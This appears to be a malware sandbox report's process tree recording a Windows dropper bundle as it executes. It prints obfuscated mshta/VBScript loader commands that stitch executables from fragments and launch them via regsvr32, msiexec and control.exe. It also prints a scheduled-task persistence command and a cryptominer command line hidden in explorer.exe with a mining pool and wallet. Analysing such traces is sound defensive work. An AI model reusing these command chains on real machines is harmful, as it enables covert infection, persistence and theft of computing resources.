C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01f932a994dbc6.exe"C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01f932a994dbc6.exe" -u7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat0119f3e03c741b02f.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat0119f3e03c741b02f.exeSat0119f3e03c741b02f.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 588 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01519886887.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01519886887.exeSat01519886887.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScript: ClOsE( cReaTeOBjECt ( "wSCriPt.SHELL"). RUN ( "CMD /Q /C tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01519886887.exe"" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF """" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01519886887.exe"") do taskkill -f /Im ""%~NxM"" " , 0, TRue) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01519886887.exe" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF "" =="" for %M In ( "C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01519886887.exe") do taskkill -f /Im "%~NxM"8⤵
-
C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE..\BBIOhV.Exe -PTptXOWlEYbyb9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScript: ClOsE( cReaTeOBjECt ( "wSCriPt.SHELL"). RUN ( "CMD /Q /C tYpE ""C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE"" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF ""-PTptXOWlEYbyb "" == """" for %M In ( ""C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE"") do taskkill -f /Im ""%~NxM"" " , 0, TRue) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYpE "C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE" > ..\BBIOHV.eXE&& stArT ..\BBIOhV.Exe -PTptXOWlEYbyb & iF "-PTptXOWlEYbyb " =="" for %M In ( "C:\Users\Admin\AppData\Local\Temp\BBIOHV.eXE") do taskkill -f /Im "%~NxM"11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRiPt: CLoSe (creAtEOBJECt ( "WsCRIPt.sHeLl"). rUn ("cMD /Q /C Echo C:\Users\Admin\AppData\Local\TempNgu> Tqd1uZH.w & ECho | set /p = ""MZ"" > IRPJ4p_.E &CoPy /b /y IRPJ4p_.E+ k1OWwJBF._n + ZiENV9W.9 + TJDT~50N.T+ Q3ePSE6P.B + u0zN.v+ TqD1UZH.W ..\xEULvZFM.BWq & Del /q *& StarT control ..\XEULVZFm.BWq " , 0 , TRUE ) )10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C Echo C:\Users\Admin\AppData\Local\TempNgu> Tqd1uZH.w &ECho | set /p = "MZ" > IRPJ4p_.E &CoPy /b /y IRPJ4p_.E+ k1OWwJBF._n +ZiENV9W.9+ TJDT~50N.T+Q3ePSE6P.B+ u0zN.v+ TqD1UZH.W ..\xEULvZFM.BWq &Del /q *& StarT control ..\XEULVZFm.BWq11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>IRPJ4p_.E"12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECho "12⤵
-
C:\Windows\SysWOW64\control.execontrol ..\XEULVZFm.BWq12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\XEULVZFm.BWq13⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\XEULVZFm.BWq14⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\XEULVZFm.BWq15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "Sat01519886887.exe"9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01c5002407.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01c5002407.exeSat01c5002407.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01688f54435b6.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat018ad0a25a7faa.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01e3b3e0fa80800c.exe5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat01b537da2e0af175a.exe5⤵
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\13bpu9cGZVQ3bQBYByHDZulD.exe"3⤵
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\SysWOW64\svchost.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\1067.exeC:\Users\Admin\AppData\Local\Temp\1067.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1067.exeC:\Users\Admin\AppData\Local\Temp\1067.exe3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7A9C.exeC:\Users\Admin\AppData\Local\Temp\7A9C.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\875E.exeC:\Users\Admin\AppData\Local\Temp\875E.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\62FA.exeC:\Users\Admin\AppData\Local\Temp\62FA.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\86BF.exeC:\Users\Admin\AppData\Local\Temp\86BF.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9996 -s 2323⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\C669.exeC:\Users\Admin\AppData\Local\Temp\C669.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\C669.exeC:\Users\Admin\AppData\Local\Temp\C669.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\3810.exeC:\Users\Admin\AppData\Local\Temp\3810.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\evil_00000461748.exe"C:\Users\Admin\AppData\Local\Temp\evil_00000461748.exe"3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 16964 -s 3964⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\Leverages.exe"C:\Users\Admin\AppData\Local\Temp\Leverages.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Leverages.exeC:\Users\Admin\AppData\Local\Temp\Leverages.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\Leverages.exeC:\Users\Admin\AppData\Local\Temp\Leverages.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\5C91.exeC:\Users\Admin\AppData\Local\Temp\5C91.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\30.10.21_.exe"C:\Users\Admin\AppData\Local\Temp\30.10.21_.exe"3⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\154de2777e56314fc82ddac571ee3af0309b601a_2021-10-30_13-10.exe"C:\Users\Admin\AppData\Local\Temp\154de2777e56314fc82ddac571ee3af0309b601a_2021-10-30_13-10.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 17540 -s 2364⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7FAA.exeC:\Users\Admin\AppData\Local\Temp\7FAA.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15484 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\8F99.exeC:\Users\Admin\AppData\Local\Temp\8F99.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\948C.exeC:\Users\Admin\AppData\Local\Temp\948C.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15968 -s 2363⤵
- Program crash
- Enumerates system info in registry
-
C:\Program Files (x86)\Eatbxn\ThumbCachefjy.exe"C:\Program Files (x86)\Eatbxn\ThumbCachefjy.exe"2⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 934d9f33f05f23e45b5848e65f548e40 QetSX7lZxUCGQuYWnW8MUA.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01e3b3e0fa80800c.exeSat01e3b3e0fa80800c.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 18562⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01688f54435b6.exeSat01688f54435b6.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01b537da2e0af175a.exeSat01b537da2e0af175a.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"4⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe6⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth8⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3733084.exe"C:\Users\Admin\AppData\Roaming\3733084.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\2626800.exe"C:\Users\Admin\AppData\Roaming\2626800.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\6431454.exe"C:\Users\Admin\AppData\Roaming\6431454.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2775016.exe"C:\Users\Admin\AppData\Roaming\2775016.exe"4⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8794846.exe"C:\Users\Admin\AppData\Roaming\8794846.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse( CreaTEOBjeCt ( "WsCRiPT.sHelL").RUn ("C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\Users\Admin\AppData\Roaming\8794846.exe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if """" =="""" for %N In (""C:\Users\Admin\AppData\Roaming\8794846.exe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\Users\Admin\AppData\Roaming\8794846.exe" > seV03VBOUIE.eXe&&StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "" =="" for %N In ("C:\Users\Admin\AppData\Roaming\8794846.exe" ) do taskkill -IM "%~nxN" /F6⤵
-
C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXesev03VbOUie.exe -POVwq7z4ndmK6x4P7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse( CreaTEOBjeCt ( "WsCRiPT.sHelL").RUn ("C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if ""-POVwq7z4ndmK6x4P "" =="""" for %N In (""C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )8⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe" > seV03VBOUIE.eXe&&StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "-POVwq7z4ndmK6x4P " =="" for %N In ("C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe" ) do taskkill -IM "%~nxN" /F9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt:closE (CreAteObjECt( "wsCRIPT.sheLl" ). rUn ("Cmd /R EcHo | Set /P = ""MZ"" > i61_m6.3i &cOPY /B /Y I61_M6.3I +XvVu.W4A+ Z9NNU.Z + W~cD4C.x + g3Fv7XCY.TZG + 4D8yN3.MnJ FMHAm.5Hv & stArT regsvr32 -s FMHAM.5hV " , 0 , TRuE ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHo | Set /P = "MZ" > i61_m6.3i &cOPY /B /Y I61_M6.3I +XvVu.W4A+ Z9NNU.Z+W~cD4C.x + g3Fv7XCY.TZG + 4D8yN3.MnJ FMHAm.5Hv & stArT regsvr32 -s FMHAM.5hV9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>i61_m6.3i"10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 -s FMHAM.5hV10⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "8794846.exe" /F7⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\3442364.exe"C:\Users\Admin\AppData\Roaming\3442364.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\7824814.exe"C:\Users\Admin\AppData\Roaming\7824814.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"9⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 6164⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=14⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"5⤵
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ff87888dec0,0x7ff87888ded0,0x7ff87888dee06⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,17785404444149185339,308749776774750058,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw14652_3676125" --mojo-platform-channel-handle=1744 /prefetch:86⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1512,17785404444149185339,308749776774750058,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw14652_3676125" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2456 /prefetch:16⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1512,17785404444149185339,308749776774750058,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw14652_3676125" --mojo-platform-channel-handle=2232 /prefetch:86⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1512,17785404444149185339,308749776774750058,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw14652_3676125" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:26⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1512,17785404444149185339,308749776774750058,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw14652_3676125" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2580 /prefetch:16⤵
-
